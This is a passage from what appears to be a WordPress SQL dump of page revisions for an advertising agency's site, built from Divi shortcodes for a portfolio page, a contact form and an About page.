submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" fullwidth_field=\"on\" _builder_version=\"4.5.2\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Work','','inherit','closed','closed','','396-revision-v1','','','2020-08-08 20:37:54','2020-08-08 20:37:54','',396,'https://wthtest1.in8.cdn-alpha.com/2020/08/08/396-revision-v1/',0,'revision','',0),(722,1,'2020-08-08 20:38:20','2020-08-08 20:38:20','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"|||\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>Our work</h1>\r[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off%22\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Projects Section\" _builder_version=\"4.5.2\" custom_margin=\"|||\" custom_padding=\"50px||50px||false|false\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Project 01\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"5%||5%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Number\" _builder_version=\"4.5.2\" text_font=\"Montserrat|on|||\" text_text_color=\"#d4b068\" text_font_size=\"80px\" text_line_height=\"1em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]01\r[/et_pb_text][et_pb_cta title=\"Wet & Dry - Corporate Catalogue\" button_url=\"#\" button_text=\"View Project\" _builder_version=\"4.5.2\" header_font=\"Montserrat|700|||||||\" header_text_color=\"#353740\" header_line_height=\"1.5em\" body_font=\"Montserrat||||||||\" body_text_color=\"#747d88\" body_font_size=\"18px\" body_line_height=\"1.8em\" use_background_color=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|700||on|||||\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" text_orientation=\"left\" background_layout=\"light\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"6%\" hover_enabled=\"0\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p>A Corporate Brochure/ Product Catalogue to represent the key USPs of the brand and company as a whole. Wonderful graphic designing and beautiful product shots to make the product and brand stand out for an awesome b2b representaiton.</p>\n[/et_pb_cta][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-b1-1.jpg\" alt=\"Brochure-catalogue\" title_text=\"800x800 b1 (1)\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Project 02\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"50px|||\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" alt=\"Creative graphic designing\" title_text=\"Creative graphic designing\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"5%||5%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Number\" _builder_version=\"4.5.2\" text_font=\"Montserrat|on|||\" text_text_color=\"#d4b068\" text_font_size=\"80px\" text_line_height=\"1em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]02\r[/et_pb_text][et_pb_cta title=\"Neud Hair Spray - Product Packaging\" button_url=\"#\" button_text=\"View Project\" _builder_version=\"4.5.2\" header_font=\"Montserrat|700|||||||\" header_text_color=\"#353740\" header_line_height=\"1.5em\" body_font=\"Montserrat||||||||\" body_text_color=\"#747d88\" body_font_size=\"18px\" body_line_height=\"1.8em\" use_background_color=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|700||on|||||\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" text_orientation=\"left\" background_layout=\"light\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"6%\" hover_enabled=\"0\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" content__hover_enabled=\"on|desktop\"]<p>The product packaging design is planned keeping in mind the rich and luxory look. The brand colors has been used in an effective arrangement to carry the product family design language and keeping it unique at the same time. Wonderfully executed 3D Mockup.</p>\n[/et_pb_cta][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Project 03\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"50px|||\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"5%||5%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Number\" _builder_version=\"4.5.2\" text_font=\"Montserrat|on|||\" text_text_color=\"#d4b068\" text_font_size=\"80px\" text_line_height=\"1em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]03\r[/et_pb_text][et_pb_cta title=\"Zap Booking - Flyer/Emailer Design\" button_url=\"#\" button_text=\"View Project\" _builder_version=\"4.5.2\" header_font=\"Montserrat|700|||||||\" header_text_color=\"#353740\" header_line_height=\"1.5em\" body_font=\"Montserrat||||||||\" body_text_color=\"#747d88\" body_font_size=\"18px\" body_line_height=\"1.8em\" use_background_color=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|700||on|||||\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" text_orientation=\"left\" background_layout=\"light\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"6%\" hover_enabled=\"0\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p>A well structure template has been adopted with the use of brillinat cover image as a hook up factor. Various color has been used to keep the destination identity uniquely defined. Adopted to html emailers for digital campaign.</p>\n[/et_pb_cta][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-Fl-copy-2.jpg\" alt=\"Flyer Design\" title_text=\"Flyer Design-graphic design work\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Project 04\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"50px|||\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" alt=\"Packaging Design creative agency\" title_text=\"packaging design creative advertising agency\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"5%||5%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Number\" _builder_version=\"4.5.2\" text_font=\"Montserrat|on|||\" text_text_color=\"#d4b068\" text_font_size=\"80px\" text_line_height=\"1em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]04\r[/et_pb_text][et_pb_cta title=\"Neud After Lotion - Packaging\" button_url=\"#\" button_text=\"View Project\" _builder_version=\"3.16\" header_font=\"Montserrat|700|||||||\" header_text_color=\"#353740\" header_line_height=\"1.5em\" body_font=\"Montserrat||||||||\" body_text_color=\"#747d88\" body_font_size=\"18px\" body_line_height=\"1.8em\" use_background_color=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|700||on|||||\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" text_orientation=\"left\" background_layout=\"light\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"6%\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p>Yet another revolutionary product with brilliant design execution. Corporate brand colors has been used to give it a rich and luxurious feel. Brilliant product mockup and various concept based mockup has given life to the product.</p>[/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\" global_module=\"630\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" fullwidth_field=\"on\" _builder_version=\"4.5.2\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Work','','inherit','closed','closed','','396-revision-v1','','','2020-08-08 20:38:20','2020-08-08 20:38:20','',396,'https://wthtest1.in8.cdn-alpha.com/2020/08/08/396-revision-v1/',0,'revision','',0),(723,1,'2020-08-08 20:43:55','2020-08-08 20:43:55','Digital Expert','Google Adword Expert','','inherit','open','closed','','artboard-1','','','2020-08-08 20:44:28','2020-08-08 20:44:28','',0,'https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-1.jpg',0,'attachment','image/jpeg',0),(724,1,'2020-08-08 20:44:31','2020-08-08 20:44:31','[et_pb_section fb_built=\"1\" admin_label=\"Page Header\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"67px|0px|67.1875px|0px|false|false\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>About US</h1>\r[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"About Us Section\" _builder_version=\"4.5.2\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/WhyWE.jpg\" parallax=\"on\" custom_margin=\"|5%||5%\" custom_margin_tablet=\"\" custom_margin_phone=\"|0px||0px\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%|||\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"5%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-200px\" box_shadow_color=\"#ffffff\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"About Us Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"27px|0px|0px|0px\"][et_pb_column type=\"2_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_color=\"#f7f7f7\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"10%|10%|10%|10%\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_vertical=\"15px\" box_shadow_blur=\"45px\" box_shadow_color=\"rgba(0,0,0,0.15)\" locked=\"off\"]<h2>Build Brand Equity</h2>\n<p>Our advertising and marketing startegies are aligned towards the core objectives of the business operation of sustainable sales leading to profit and building brand equity as long term asset creation for the businesses.</p>\n<p><span style=\"font-size: 16px;\">There is a need to understand the various phases of businesses &amp; invest in marketing (Sales or Brand Building) in the required proportion. As per the budget of the business we can align our marketing and advertising strategies into aggressive disruptive to guerilla or safe. As the successful advertising and marketing require patience and balancing various market forces to help your business thrust to an upward direction.</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"56px||56px|||\"][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" 